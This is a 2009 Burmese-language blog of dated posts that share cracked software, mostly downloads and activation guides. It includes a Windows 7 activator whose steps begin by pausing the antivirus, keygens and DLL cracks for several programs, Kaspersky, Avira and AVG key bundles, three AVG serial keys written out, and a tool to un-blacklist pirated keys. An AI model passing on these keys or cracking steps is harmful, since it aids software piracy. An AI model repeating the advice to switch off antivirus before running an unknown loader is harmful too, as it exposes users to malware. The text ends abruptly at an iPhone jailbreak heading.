Saturday, October 31, 2009

ထိုင်းနိုင်ငံအတွင်းရှိ window 7 တင်ချင်သူများ သတိထား

(ထိုင်းနိုင်ငံအတွင်းရှိ မြန်မာများအတွက်သာ)
ကဲဒါကတော့ သတင်းကြားကြားချင်း အသိပေးလိုက်တာပါ . အခု ဒီနေ့ကစပြီး နောက်ထပ် တစ်လ နှစ်လအတွင်း ထိုင်းနိုင်ငံနေရာအနှံကို microsoft company မှ ၀န်ထမ်းများနှင့် ထိုင်းရဲတပ်ဖွဲ့များ တိတ်တဆိတ် လိုက်လံစစ်ဆေး နေပါတယ် . window 7 ကို လိုင်စင်မဲ့ တင်မည့်သူများ သတိတော့ထားပါ . တစ်ချို့ အင်တာနက် ဆိုင်တွေမှာ လုပ်နေကြတဲ့ မြန်မာများ လက်တည့်စမ်းချင်သော အားဖြင့် သွားပြီးတော့ မိမိလုပ်တဲ့ ဆိုင်တွေရဲ့ pc တွေမှာ ဒီ window 7 ကို သွားပြီး မတင်လိုက်ကြပါနဲ့ . တစ်ခါတည်း မာလက ဇါန်ကြွပြီး တရားရုံးကိုပါ ရောက်သွားနိုင်ပါသည် . အစကတည်းက တဆိတ်ရှိ တစ်ခုခုဖြစ် မြန်မာတွေကိုပဲ ထိုးထိုးထည့်ပေး လိုက်တဲ့ ထိုင်းနိုင်ငံသားတွေရဲ့ အကျင့်တွေကိုလဲ လုံးဝမမေ့ပါနဲ့ . လတ်တလော ကွန်ပျူတာဆိုင်တွေ ပိတ်ထားပြီး ၂ ဆိုင်လောက်တော့ ပါသွားတယ်လို့ သတင်းကြားပါတယ် . window 7 ကြီးတင်ပြီးတော့များ wireless free ရတဲ့ big C တို့လို Lotus တို့လို ကုန်တိုက်ကြီးတွေမှာ ကွန်ပျူတာလေးမပြီး သွားကစားလို့ .. နောက်ကနေ ရောက်နေတာ မသိလိုက်ပဲ ဆန့်ငင်ဆန့်ငင်နဲ့ ပါသွားဦးမယ် . သတိလဲထားပေါ့ . သုံးတာလဲသုံးပေါ့ .

Friday, October 30, 2009

window 7 ကို ဘယ်လို activate လုပ်မလဲ ..

ကဲ အောက်မှာတော့ အခုအချိန်ဆိုရင် window 7 ကို Download လုပ်ပြီးလောက်ပြီလို့ ထင်ပါတယ် .. ရက် 30 ပဲ ရတယ်ဘာညာပေါ့ . အဲ့ဒီ့တော့ အောက်မှာလဲ window 7 activator နဲ့ အဆင်ပြေတဲ့ သူတွေ ရှိသလို အဆင်မပြေတဲ့ သူများအတွက်လဲ ရှိကောင်းရှိနိုင်ပါတယ် . အခုထပ်တင်ပေးလိုက်ပါတယ် . လုပ်နည်းကိုလဲ ရေးပေးပါဦးမယ် . အောက်က loader နဲ့အဆင်မပြေသူများအတွက် အသစ် ထပ်တင်ပေးလိုက်ပါတယ် . ကျွန်တော် အခု ဒီကောင်လေးနဲ့ သုံးနေတာပါ .

လုပ်နည်း ..
  • (၁) ပထမဦးဆုံး antivirus program ကို ပိတ်ထားလိုက်ပါ . (ဥပမာ kaspersky ဆိုရင် right click >> pause protection ကို နှိပ်ပြီး pause ကိုနှိပ်ပါ )
  • (၂) ပဲ ပြီးသွားပြီဆိုတာနဲ့ . အောက်ကပေးထားတဲ့ loader လေးကို Double click နှိပ်လိုက်ပါ
  • (၃) ပြီးရင် install ကို ဆက်နှိပ်လိုက်ပါ . ပြီးတာနဲ့သူက restart တောင်းပါလိမ့်မယ် restart ပေးလိုက်ပါ .
  • (၄) ကွန်ပျူတာ ပွင့်လာတာနဲ့ window is activated ဆိုပြီးတော့ ပေါ်နေပါလိမ့်မယ် .
  • (၅) ကဲဒါဆိုရင်တော့ အားလုံးအိုကေသွားပြီလို့ ထင်ပါတယ် . ကဲ micorsoft က မနေ့တစ်နေ့ကမှ ထုတ်ပေးလိုက်တဲ့ window 7 ကို ကျွန်တော်တို့ ရွှေမြန်မာတွေ အသုံးပြုလို့ရသွားပါပြီဗျာ . ကောင်းသလားတော့ ပြန်မမေးနဲ့ ထောင်းချက်ထားတာကမှ ညံ့ဦးမယ် . window 7 OS ကိုရေးတဲ့ သူတွေကိုတော့ တစ်ကယ့်ကို ချီးကျူးတယ်ဗျာ . တစ်ကယ့်ကို လက်ဖျားခါတယ် .

ကဲ activated ဖြစ်ဖို့ key ကို အောက်မှာ ယူလိုက်ပါ . လိုလိုမယ်မယ် ၃ ခုတောင် ထည့်ထား ပေးလိုက် တယ်နော် .

Download ifile.itDownload mediafire

ကဲ ကီးတွေကိုပါ တင်ပေးလိုက်တယ် . လုပ်ချင်တဲ့ ကီးနဲ့သာကိုင်စေဗျာ . Key တွေကို ဒီမှာ Download လုပ်လိုက်ပါ .

Thursday, October 29, 2009

A+ pc hardware (မြန်မာလို)

ဒါက ဆရာ မျိုးသူရ ရဲ့ A+ စာအုပ်ပါ ။ အဓိက ရေးထားတာက အခြေခံရယ်၊
hardware ထိန်းသိမ်း နည်း ရယ်ပါ ။ အဆင်ပြေတဲ့ Link ကနေ download ဆွဲ ကြပါ ... ကျွန်တော်လည်း လေ့လာဆဲပါ ခင်ဗျာ ... ဒီ blog မှာ ရေးသားခွင့်ပြုတဲ့  ကိုညီနေမင်း ကိုလည်း အထူး ကျေးဇူးတင်ပါတယ် ခင်ဗျာ ...

Download mediafire

Hiren's BootCD v10 and other versions

ဒီ software boot cd လေးက တော်တော်လေး ကို ကောင်းပါတယ် ခင်ဗျာ .... အထူးသဖြင့် hardware technician တွေ ဒီ software ရှိမယ်ဆိုရင် ပြဿနာ တော်တော်များများကို ဖြေရှင်းဖို့ အကူအညီ ရနိုင်မှာ အသေအချာဘဲ.....အောက်မှာ Download လုပ်လိုက်ပါဦး ...

သူ့ရဲ့ မူရင်းဆိုက် က ဒီမှာ ပါ . သူ့မူရင်းဆိုက်ကနေလဲ Download လုပ်ယူလို့ ရပါတယ် . Free ပါပဲ .. window သများတွေ အတွက်တော့ ဒီကောင်လေးက လိုအပ်ပါတယ် .

Direct download ပေးထားပါတယ်

Hiren's BootCD v10 >> Direct Download

Hiren's BootCD v9.9
>> Direct Download

Hiren's BootCD v9.8
>> Direct Download

Hiren's BootCD v9.7
>> Direct Download

Download v9.3 from ifile.it

Portable များ စုစည်းမှု

ကဲအောက်မှာ portable များကို ပေါင်းစုပြီးတော့ တင်ပေးထား ပါတယ် . ၀ိုင်းဝန်းပြီး တင်ပေးတဲ့ ညီလေး တွေကိုလဲ ဒီပို့စ်လေးနဲ့ ကျေးဇူးတင် ကြောင်း ဒီနေရာလေး ကပဲ ပြောလိုက်ပါတယ် . အားလုံး ဆင်ပြေကြ ပါစေလို့ မျှော်လင့်ပါတယ် .

Download Portables

Download Nero_8.2.8.0 >>> Ifile.itMediafire
Download Registry Clean Expert 4.53 >>> Ifile.itMediafire
Download Opera 9.22 >>> Ifile.itMediafire
Download Nero 9.2.5.0 >> Ifile.itMediafire
PDF Reader Pro 1.0 >>> Ifile.itMediafire
Photoshop 7.0 >>> Ifile.itMediafire
RegCleaner V3.8 >>> Ifile.itMediafire
Norton Partition Magic_8.05 >>> Ifile.itMediafire
Orbit Downloader 2.0.1 >> Ifile.itMediafire
Poweroff v3.0.1.3 >>> ifile.itMediafire
PsmPlay5.41 >>> Ifile.itMediafire

Tuesday, October 27, 2009

Avira Premium Security Suite 9

ကဲ ဒါက avira premium v9 ကိုပဲ ထပ်ပြီးတော့ လိုအပ်တာတွေ ထပ်ဖြည့်ပြီးတော့ security suite ဆိုပြီး ထပ်ထုတ်ထားတာတာပါ .. avira နောက်ဆုံးထွက် version ပါပဲ အထဲမှာ key ပါတစ်ခါတည်းပါပြီးသားပါ . avira ချစ်သူများ သုံးနိုင်ပါတယ် .


Download ifile.itDownload mediafireDownload rapidshare

Kaspersky version အားလုံးအတွက် keys များ

ကဲ လိုအပ်နေသူများ အောက်မှာ download လုပ်ယူလိုက်ကြပါ . အားလုံးကိုပေါင်းပြီးတင်ထားပေးပါတယ် . အဆင်ပြေကြမယ်လို့ မျှော်လင့်ပါတယ် .

Download ifile.itDownload mediafire

My Screen Recorder Pro

Youtube တို့ ဘာတို့မှာ မြင်ဖူးကြမှာပါ။ တစ်ခုခု ကို ရှင်းပြပြီဆိုရင် Video ကလေးနဲ့ ရှင်းပြတာလေ . အဲဒီ့လိုမျိုးလေး လုပ်တဲ့ Software ကလေးပါ . Video ကလေးနဲ့လုပ်ပြထားတာဆိုတော့ ကြည့်ပြီးတော့ လုပ်ရတဲ့လူလည်း အဆင်ပြေတာပေါ့. .. အခု ကိုယ်လည်း အဲဒီ့လိုမျိုးကလေး ရှင်းပြမယ်ဆိုရင် ရှင်းပြလို့ရပြီနော် .. အောက် Software ကလေးကို ယူလိုက်ပါခင်ဗျာ .. ယူပြီးရင်တော့ သူ့ကို Crack ရပါဦးမယ် .. Crack တာကလည်း လွယ်ပါတယ် ။ Crack ရမယ်ဆိုပြီးတော့ စိတ်ပျက်သွားမှာစိုးလို့ပါ။။ အရင် ဆုံး အောက် က software ကလေးကိုယူပြီးတော့ Run လိုက်ပါခင်ဗျာ။ ယူပြီးတော့ Run ပြီးသွားပြီဆိုရင် သူက မေးပါလိမ့်မယ် .. အခု Run ပြီးတာနဲ့ Screen recorder ကို ဖွင့်မှာလားဆိုပြီးတော့လေ အဲဒါကို မဖွင့်ဘူး ဆိုပြီးတော့ ပဲ ပေးလိုက်ပါခင်ဗျာ .. ပြီးရင်တော့ အခု ကျွန်တော် တင်ပေးတဲ့ အထဲမှာပါတဲ့ Crack file ကလေးကို ဖွင့်လိုက်ပါ.. ဖွင့်ပြီးသွားပြီဆိုရင်တော့ အဲဒီ့ အထဲက .dll ဖိုင်နှစ်ဖိုင်ကို Copy ကူးလိုက်ပါခင်ဗျာ ။ ကူးပြီ:ရင်တော့ အောက် လမ်းကြောင်းကလေး အတိုင်းသွားလိုက်ပါ ။
C:\Program Files\Deskshare\My Screen Recorder Pro

အဲဒီ့ လမ်းကြောင်းကလေး အတိုင်းသွားပြီးပြီ ဆိုရင်တော့ အဲဒီ့ My Screen Recorder Pro ဆိုတဲ့ ဖိုင်ထဲမှာ စောစောက ကူးလာခဲ့တဲ့ .dll ဖိုင်လေးတွေကို Paste လုပ်ပေးလိုက်ပါ ခင်ဗျာ ။ အဲဒီ့ အခါကျရင်သူက ဆက်လုပ်မှာလား လို့မေးတဲ့ box ပေါ်လာရင်တော့ Yes ကို ပေးလိုက်ပေါ့ ။ အဲဒါဆိုရင်တော့ ရပြီဗျာ ... Unregistered version မဟုတ်တော့ ဘူးဗျာ Full version ဖြစ်သွားပါပြီ။ ပြီးရင်တော့ ဖွင့်ပြီးတော့ ရိုက်ကူးရေး အစီအစဉ်ကို စတင်နိုင်ပါကြောင်း ..
ကဲအောက်မှာ Download လုပ်ယူလိုက်ပါဗျာ .

Download mediaifreDownload ifile.it

Monday, October 26, 2009

ဓါတ်ပုံတစ်ပုံနှင့် တစ်ခြားသူရဲ့ ip, နိုင်ငံ, သူသုံးတဲ့ browser, နဲ့ အခြား အချက်အလက်များကို သိရှိနိုင်

ဒီနေ့တော့ ရေးရမှာ ပျင်းတာနဲ့ ဗဟုသုတအနေနဲ့ ပြောပြပါ့မယ် . အခုအချိန်မှာ နည်းပညာထွန်းကားတဲ့ ကာလတစ်ခုပါ . အဲ့ဒီ့တော့ အမြဲတမ်း မိမိကိုယ်ကိုယ်ကာကွယ်မှု လုံခြုံမှုရှိအောင် အမြဲတစေ ကာဗာယူထားရင် ပိုကောင်းပါတယ် . ဥပမာ. ဓါတ်ပုံတစ်ပုံပို့လိုက်တယ်ဆိုပါစို့ ၊ တစ်ဖက်လူက မိမိပို့လိုက်တဲ့ ဓါတ်ပုံကိုဖွင့်ကြည့်လိုက်တာနဲ့ အဲ့ဒီ့လူက ဘယ်မြို့၊ ဘယ်နိုင်ငံကနေ အခုလက်ရှိ ကွန်ပျူတာကိုသုံးနေတယ် ၊ ပြီးတော့ browser ကို ဘာအမျိုးအစားသုံးတယ် version စတဲ့အချက်အလက် တွေကို သိရှိနိုင်ပါတယ် . ဒါကိုကျွန်တော်တို့က tracking လုပ်တယ်လို့ခေါ်ပါတယ် . ကိုကြည့်လိုက်တဲ့သူက ဓါတ်ပုံကို ကလစ်နှိပ်လိုက်တာနဲ့ အောက်က နမူနာ အချက်အလက်တွေကို automatic မိမိရဲ့ email ထဲကို ရောက်လာပါတယ် . စမ်းချင်ရင်တော့ http://www.spypig.com ကိုသွားပြီး စမ်းကြည့်လိုက်ပါ . လုပ်နည်းကိုတော့ ကျွန်တော်မပြောပြတော့ပါဘူး . အဲ့တော့ ကျွန်တော် တစ်ခုသတိပေးချင်တာက မိမိမသိတဲ့သူ တစ်စုံတစ်ယောက်က မေးလ်ပို့လာရင် ဘယ်တော့မှ အလျင်စလို မဖွင့်ဖတ်ကြပါနဲ့ ၊ ကိုနဲ့မသိရင် ဖျက်ပစ်တာ အကောင်းဆုံးပါပဲ၊ အခုအချိန်မှာ mail ပို့လိုက်တာနဲ့ ကို့မေးလ်ကို တစ်ဖက်လူက ဖွင့်ဖောက်လိုက်တာနဲ့ တစ်ဖက်လူ လက်ရှိသုံးနေတဲ့ email ရဲ့ username နဲ့ password ကိုတောင် သိနိုင်နေပါပြီ၊ အဲ့ဒီ့တော့ ကျွန်တော်တို့က keylogger ကိုချည်းပဲ အတင်းဂရုစိုက်ပြီးတော့ လိုက်ရှာနေပေမယ့် . ကို့ရဲ့အချက်အလက်တွေကို email ပို့တဲ့စနစ်နဲ့လဲ မိမိရဲ့အချက်အလက်တွေကို သယ်ဆောင်သွားနိုင်ပါတယ် . ဂရုစိုက်ကြဖို့တော့လိုပါတယ် . program ကိုသုံးပြီး မေးလ်ပို့လိုက်ပြီးတာနဲ့ အဲ့ဒီ့သူရဲ့ id နဲ့ password ကို ယူလို့ရပါသေးတယ် . မယုံမရှိပါနဲ့၊ တစ်ကယ်ခံသွားရနိုင်ပါတယ် .အကောင်းဆုံးက သံသယရှိတဲ့မေးလ်ဆိုရင် မဖောက်ဖတ်ပါနဲ့၊ ထူးထူးဆန်းဆန်း ဘာဖြစ်တယ် ညာဖြစ်တယ်ဆိုတာလေးကို သိချင်ဇောနဲ့ ကိုယ့်ရဲ့ iD နဲ့ password တွေ ပါသွားနိုင်ပါတယ် . အောက်မှာ spypig.com ကနေ နမူနာလုပ်ပြလိုက်ပြီး ကျွန်တော့်မေးလ်ထဲကို ပို့လာတဲ့ အချက်အလက် နမူနာပါ. Ip ကိုတော့ ကျွန်တော် ဖျက်ထားပါတယ် .

Sent by You:
Tuesday, October 20, 2009, 2:27:37 PM (GMT +7:00)
3 minutes 0 seconds ago
Opened by Recipient:
Tuesday, October 20, 2009, 2:31:07 PM (GMT +7:00)
(This email has been opened 3 times)
Up to 3 openings are tracked as per your selection
Recipient Location:
Australia
(May be inaccurate)

Recipient IP: xxx .xxx.xx.xx
(xxx .xxx.xx.xx)
Recipient Browser:
Firefox 3.5.3 (Windows)
(Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3)

Sunday, October 25, 2009

Freedom ကို မြန်မာလို ပြင်ဆင်မှု ပြုပြီး ကျော်ခွကြပါစို့ .

ဒီနေ့တော့ မအားတဲ့ကြားထဲကနေ ကျွန်တော် ကြိုးစားပြီး တင်ပေး လိုက်ပါတယ် . လွယ်ပါတယ် . setting မှာကို မြန်မာလို ရေးထားတာပဲကို လွယ်တာပေါ့ အဟဟ . အောက်မှာ Freedom ကို တင်ထား ပေးပါတယ် . အရင်ဆုံး ဒေါင်းလိုက်ပါဦး . Freedom + Openvpn v1.6, v2.0.9, v2.1 ပေါင်းထည့်ထား ပေးပါတယ် . openvpn ကို version အဟောင်းကိုပါ ထည့်ပေးထားပါတယ် . လိုအပ်ရင် သုံးရတာ လွယ်ကူအောင်လို့ပါ . မြန်မာပြည်က freedom.net ကို ပိတ်ထားတယ်ထင်လို့ အိတ်သွန်ဖာမှောက် Download လုပ်ပြီး တင်ပေးလိုက်တာပါ .

ဒါလေးက လူတိုင်းအတွက် အရေးပါတော့ လုံးဝမသိသေးတဲ့ ညီ/ညီမများအတွက် ရည်ရွယ်ပါတယ် .

(၁) ရလာတဲ့ ဖိုင်ကို win rar နဲ့ ဖြေလိုက်ပါ . win rar မရှိသူများ ဒီမှာ Download လုပ်ယူပါ .. ဖိုင်ဖြေပြီးတာနဲ့ Download လုပ်လို့ရလာတဲ့ freedom နှင့် openvpn ကို install လုပ်ပါမယ် .
(၂) ပြီးတာနဲ့ freedom ကို run လိုက်ပါ . အောက်ပါအတိုင်း language ပေါ်လာပါလိမ့်မယ် . အဲ့ဒီ့အထဲကမှ မြန်မာစာ ဆိုတာလေးကို double click နှိပ်လိုက်ပါ .
(၃) အဲ့မယ် ရေးထားတဲ့ သတ်မှတ်ချက်တွေနဲ့ လမ်းညွှန်ချက်တွေကို သေသေချာချာလိုက်ဖတ်လိုက်ပါ . လွယ်ပါတယ် . အဓိကက Account Information မှာ မိမိအပေါ်က လုပ်ခဲ့တဲ့ username နဲ့ password ကိုထည့်ပါ . Proxy Address နဲ့ proxy port ကို မှန်ကန်အောင်ဖြည့်ပါ .


Download ifile.itDownload mediafire

Saturday, October 24, 2009

လာပါပြီဗျာ SUPERAntiSpyware Pro 4.2 with keygen and patch

ကဲ ကျွန်တော်တို့ တစ်ချို့ မိန်းကလေးတွေ ဆိုရင် keylogger ရဲ့ မစမှုကြောင့် အရှက်တကွဲ အကျိုးနည်း ဖြစ်ကြတာလဲ မနည်းပါဘူး . keylogger က ကျွန်တော်တို့သိတဲ့ ရိုးရိုး keylogger ကတော့ keylogger ကို ဖွင့်ထားရင် task manager ကနေ ပြန်ခေါ်ပြီး ကြည့်ရင် ရကောင်းရနိုင်ပေမယ့် actual keylogger မျိုးကျတော့ တော်ရုံတန်ရုံနဲ့ ရှာလို့မရပါဘူး . တော်တော်များများ သိထားကြတာက keylogger ဆိုရင် task manager ကနေ ခေါ်ပြီးတော့ ပိတ်ထားရင် ရပြီလို့ သိထားကြတာပါ . အဲ့ဒါဆိုရင် task manager ကို ကြည့်လို့ keylogger မတွေ့ရင် မတင်ထားဘူးဆိုပြီး ပြောချင်တာပြော၊ ဆိုချင်တာဆိုရင်တော့ အောင်မငီးအမေရေ သားအဖြစ်ကို လာကြည့်လှည့်ပါဦး ဆိုတာထက် ဆိုးသွားမယ် . အခုအချိန်မှာ လက်တည့်စမ်းချင်ကြတဲ့ ညီအစ်ကိုများ နဲ့ သွားတွေ့လို့ကတော့ နားကားပြီသာပြင်ပေတော့ . အဟဲဟဲ . ကဲ အခုပေးတာလေးက ဘာတွေ စွမ်းဆောင်ပေးလဲ ကြည့်ကြည့်ပါ . သူက Spyware, Adware, Malware, Trojans, KeyLoggers, Dialers, Hi-Jackers, နှင့် Worms. စတာတွေကို လက်ရှိသုံးနေတဲ့ ကွန်ပျူတာမှာ တင်ထားတဲ့ program ကို ထိခိုက်မှုမရှိဘဲနဲ့ ဖယ်ရှားပေးပါတယ် . အဟဲ ဒီလောက်ဆိုရင်တော့ သဘောပေါက်လောက်မယ်လို့ထင်ပါတယ် . တစ်ချို့ program တွေမှာ malware ကပ်ငြိနေတယ်ဆိုရင်တောင် မှ သူက ထိခိုက်မှုမရှိဘဲ ဖယ်ပေးနိုင်တယ်ဆိုတော့ မဆိုးဘူးလို့ဆိုရမှာပါပဲ . ကောင်းတာလေးက ဘယ် keyloggers မျိုးမဆို သူက သိနိုင်ပြီး ဖယ်ရှားပေးနိုင်ပါတယ် . ကဲ စမ်းကြည့်လိုက်ကြပါဦး . ဟုတ်လားမဟုတ်လား . actual keylogger တင်ပြီးတော့ စမ်းပြီး စစ်ကြည့်ပေါ့ .

ကဲအောက်မှာ ယူလိုက်ပါ .

Download ifile.itDownload mediafire

Friday, October 23, 2009

avira premium key ပါ

ညီလေး သီဟဇော် ပြန်ပြီး share ပေးထားတာပါ . avira သုံးသူများ လိုအပ်မယ်ဆိုရင် အောက်မှာ ယူလို့ရပါတယ် . အဆင်ပြေပါစေဗျာ ..

Download sent6Download mediafire

Thursday, October 22, 2009

Winamp 5.56 Pro

ကဲ အသစ်ကလေး တင်ပေး လိုက်ပါပြီ . သူကတော့ player တစ်ခုပါပဲ . အတော်လေး လူကြိုက်များ ကြပါတယ် . ကျွန်တော်လဲ ကြိုက်ပါတယ် . winamp ကို သုံးဖူးတဲ့သူတွေ သိကြမှာပါ . ကဲအောက်မှာ download လုပ်ယူလိုက်ပါဦး .

Download ifile.itDownload mediafire

တိုတိုထွာထွာအဖြေများ .

kaungkin "အစ်ကိုရေ Mozilla firefox မှာ webpage တွေကို Right Click လုပ်လို့ မရတော့လို့ ဘယ်လို လုပ်ရမလဲ ဆိုတာ သိချင်ပါတယ် ခင်ဗျာ"

ကျွန်တော် တစ်ခုအသိပေးချင်ပါတယ် . အားလုံးကို အခုကျွန်တော်တို့ firefox က 3.5 ထွက်နေပါပြီ . အဟောင်းကို သုံးနေတဲ့သူများ update လုပ်လိုက်ကြပါ . kaungkin က အဟောင်းနဲ့တူတယ်. အောက်ကနည်း (၃)မျိုးမှာ အဆင်ပြေတာနဲ့ သုံးကြည့်လိုက်ပါ . အဆင်ပြေမှာပါ . တစ်ခုပြောချင်ပါတယ် . OS က အခုတင်ထားတာ window လား ..

နည်းလမ်း(၁) ယခုလက်ရှိသုံးနေတဲ့ firefox ကို ဖြုတ်ပြီး ဒီ ကနေ အသစ်ဒေါင်းပြီးတော့ ပြန်တင်လိုက်ပါ .
နည်းလမ်း(၂) ဒီကနေ Browse in the Fast Lane ကို download လုပ်ပြီး စမ်းသုံးကြည့်ပါဦး
နည်းလမ်း(၃) Tools >> Add-ons >> find update ကို နှိပ်လိုက်ပြီးရှာလိုက်ပါ . ပြီးတာနဲ့ သူကနေ update မဖြစ်တာတွေကို တစ်ခုမကျန် အကုန်လုံးကို တစ်ခုပြီးတစ်ခု install လုပ်လိုက်ပါ . တစ်ခုမှ မချန်ထားပါနဲ့ . တွေ့သမျှဟာကို install လုပ်လိုက်ပါ .

Download KIS New Keys

ကဲ တင်ပေးလိုက်ပါပြီ . ကီးတွေ အဆင်မပြေ ကြတဲ့သူများ . အတွက် လုပ်နည်းတွေလဲ ပြောပြ ထားပြီးပါပြီ . အခုဟာကတော့ လတ်တလော အတွက် သက်တမ်းတိုးဖို့ အတွက်ပေါ့ . ကဲအဆင်ပြေ ကြမယ်လို့ မျှော်လင့်ပါတယ်ဗျာ . အောက်မှာ download လုပ်လိုက်ကြပါ .

Download ifile.itDownload mediafire

AVG Antivirus 8.5 Pro နှင့် 9

လိုင်စင်နဲ့ပါ သက်တမ်းက 2018 အထိ ရှိပါတယ် . ကဲ free မဟုတ်တဲ့ အတွက် အဆင်ပြေကြမှာပါ . လူတစ်ကိုယ် အကြိုက်တစ်မျိုး စီပေါ့ . ဒါက avg သမားတွေ အတွက်ပါ . အောက်မှာ download လုပ်ယူလိုက်ပါ ..

Download ifile.it >> Part(1)Part(2)Part(3)Part(4)
Download mediafire >> Part(1)Part(2)Part(3)Part(4)

ဒါကတော့ ညီလေးကိုထက် လာပေးသွားတာပါ အလုပ်လုပ်တယ်လို့တော့ပြောပါတယ် . သုံးကြည့်လိုက်ပါဦး .

AVG Internet Security 9 >>> Download mediafire

Key 1 : 8MEH-RXYFD-JUV72-8922R-FTBZ6-QEMBR-ACED
Key 2 : 8MEH-R2CML-SS7FW-MOXFR-TRU8V-3EMBR-ACED
Key 3 : 8MEH-RF7RF-MR8JO-EWOVA-UVKMQ-FEMBR-ACED

Download Quicktime Pro 7.6

Online မှာ တင်ပေးထားတဲ့ tutorial တော်တော်များများဟာ အခုပေးလိုက်တဲ့ Quicktime ရှိမှ အဆင်ပြေပြေနဲ့ ကြည့်လို့ရမှာပါ . ကျွန်တော်လဲ တင်ထားတာ ရှိပါတယ် . joomla နဲ့ ၀ဘ်ဆိုက် ဘယ်လို တည်ဆောက်မယ် ဆိုတဲ့ tutorial movies များကို အခုပေးလိုက်တဲ့ quick time နဲ့ကြည့်ရမှာပါ . ကဲ လိုချင်ရင်တော့ အောက်မှာ ယူလိုက်ပါဗျာ . အဆင်ပြေကြမှာပါ . ဥပမာ ဒီလင့် ကိုကြည့်လိုက်ပါ .

Download ifile.it ၊ Download mediafire

Wednesday, October 21, 2009

System Mechanic Profession 9.0.4 Latest

ဖိုးနေ or 4-N ကိုညီရေ. System Mechanic version 9 software ကို full အနေနဲ့ လိုခြင်တယ် ကိုညီ ရာ ဖြစ်နိုင်ရင်တင်ပေးပါလား

System Mechanic 9 Make your old PC run like new. Keep your new PC running fast and problem-free. System and registry clutter will degrade your computer's performance, leading to crashes, longer boot times, and system errors. System Mechanic combines over 40 powerful PC tuneup tools to clean hard drive clutter, repair your registry, defragment drives and memory, manage programs, boost your Internet connection, and remove spyware.

အသစ်ထပ်တင်ပေးလိုက်ပါတယ် နောက်ဆုံးထွက်ပါပဲ . အဆင်ပြေမယ်ထင်ပါတယ် .

Download ifile.it >> Part(1)Part(2)Part(3)

Tuesday, October 20, 2009

Kaspersky keys တွေကို black list မှ whitelist သို့ပြောင်းခြင်း

ဒီ program လေးကတော့ black list ဖြစ်နေတဲ့ ကီးတွေကို white list ဖြစ်အောင် ပြန်အသက်သွင်း နိုင်ပြီး . kaspersky ရဲ့ update အလုပ်ကို ဆက်လက် လုပ်ဆောင်နိုင်ပါတယ် . ဘာပြဿနာမှမရှိပါဘူး . စမ်းကြည့်ကြ ပါဦး . အဆင်ပြေမယ်လို့ မျှော်လင့်ပါတယ် . ကျွန်တော်အလုပ်မအားလို့ အသေးစိတ်တော့ မရေးပေးနိုင်တာ ခွင့်လွှတ်ကြပါ .


Download ifile.itDownload mediafireDownload rapidshare

Microsoft .NET Framework (32 & 64 Bit Windows)

သီဟဇော် ".net framework software ကို free download ဆွဲချင်လို့ ဘယ်မှာ ဆွဲရမလဲ ပြောပြပေူပါခင်ဗျာ...."
The Microsoft .NET Framework 3.0 is the new managed code programming model for Windows®. It combines the power of the .NET Framework version 2.0 with new technologies for building applications that have visually compelling user experiences, seamless communication across technology boundaries, and the ability to support a wide range of business processes. These new technologies are Windows Presentation Foundation, Windows Communication Foundation, Windows Workflow Foundation, and Windows CardSpace. The .NET Framework 3.0 is included as part of the Windows Vista™ operating system; you can install it or uninstall it using Windows Features Control Panel. This redistributable package is for Windows XP and Windows Server 2003.

System Requirements:
Supported Operating Systems: Longhorn (Windows Code Name) ; Windows Server 2003 Service Pack 1; Windows Vista; Windows XP Service Pack 2
.NET Framework 3.0 (32bit) >> Download rapidshare

.NET Framework 3.0 (64bit) >> Part(1) Part(2)

ဒါကတော့ microsoft က ပေးထားတဲ့ direct link ပါ
.Net framework 1.1 Download (or) Download mediafire (or) Download ifile.it
.net Framework 2.0 Download
.net Framework 3.0 Download
.net framewordk 3.5 Download

Ccleaner နောက်ဆုံးထွက်

ကဲအောက်မှာယူလိုက်ပါ . သူကတော့ ကျွန်တော်တို့ password တွေ မကျန်ခဲ့အောင်လို့ အပြောင်ရှင်း ရတာပါ .tmp နှင့် အခြား မလိုအပ်တဲ့ file တွေကိုလဲ ရှင်းလင်းပေးပါတယ် .ကျွန်တော်တို့ IE, Firefox, Opera, နဲ့ တစ်ခြား browser တွေကိုသုံးပြီးတော့ အင်တာနက်ဝင်မယ် email စစ်မယ်ဆိုရင် cookies နဲ့ တစ်ခြား အချက်အလက်တွေ ကျန်ခဲ့နိုင်တယ် . အဲ့ဒီ့အတွက် ကျွန်တော်တို့က ဘာအချက်အလက်မှ မကျန်ခဲ့အောင်လို့ ccleaner ကိုအသုံးပြုပြီး အပြောင်ရှင်းခဲ့နိုင်ပါတယ် . စမ်းချင်သူများ စမ်းကြည့်ပါဦး . ကျွန်တော်တော့ အလုပ်များနေလို့ . အသုံးပြုပုံအသုံးပြုနည်းကို နောက်မှပဲရေးပေးပါ့မယ် . လွယ်ပါတယ် စမ်းကြည့်ကြပါ .

Download ifile.itDownload mediafire

Monday, October 19, 2009

LimeWire Pro 5.3 Cracked

ဘာလဲဆိုတာတော့ သိပြီးလောက်ပြီ ထင်ပါတယ် . သီချင်းတွေ movie တွေကို လိုက်ရှာတာ . လိုချင်ရင် အောက်မှာ download လုပ်လိုက်ကြပါ .

Download ifile.itDownload mediafire

Sunday, October 18, 2009

Download RegistryBooster 2010

ကဲ ဦးဦးဖျားဖျားလေး တင်ပေးလိုက်ပါတယ် . Registry booster လေးပါ . ရရချင်းပဲ တင်ပေးလိုက်တာပါ . ကဲ download လုပ်ချင်တဲ့သူများ အောက်မှာ ကိုင်လိုက်ပါ . အခုတစ်လော အလုပ်တွေ ပိနေလို့ ပို့စ်တွေတောင် တင်ဖို့မအားဘူးဖြစ်နေတယ် . အားတဲ့အချိန်လေး တင်ပေးလိုက်တာပါ . အဆင်ပြေမယ်လို့ မျှော်လင့်ပါတယ် ..

Download ifile.itDownload mediafire

Friday, October 16, 2009

iphone အား Unlock နှင့် jailbreak ခေါ် ထောင်ဖောက်ခြင်း

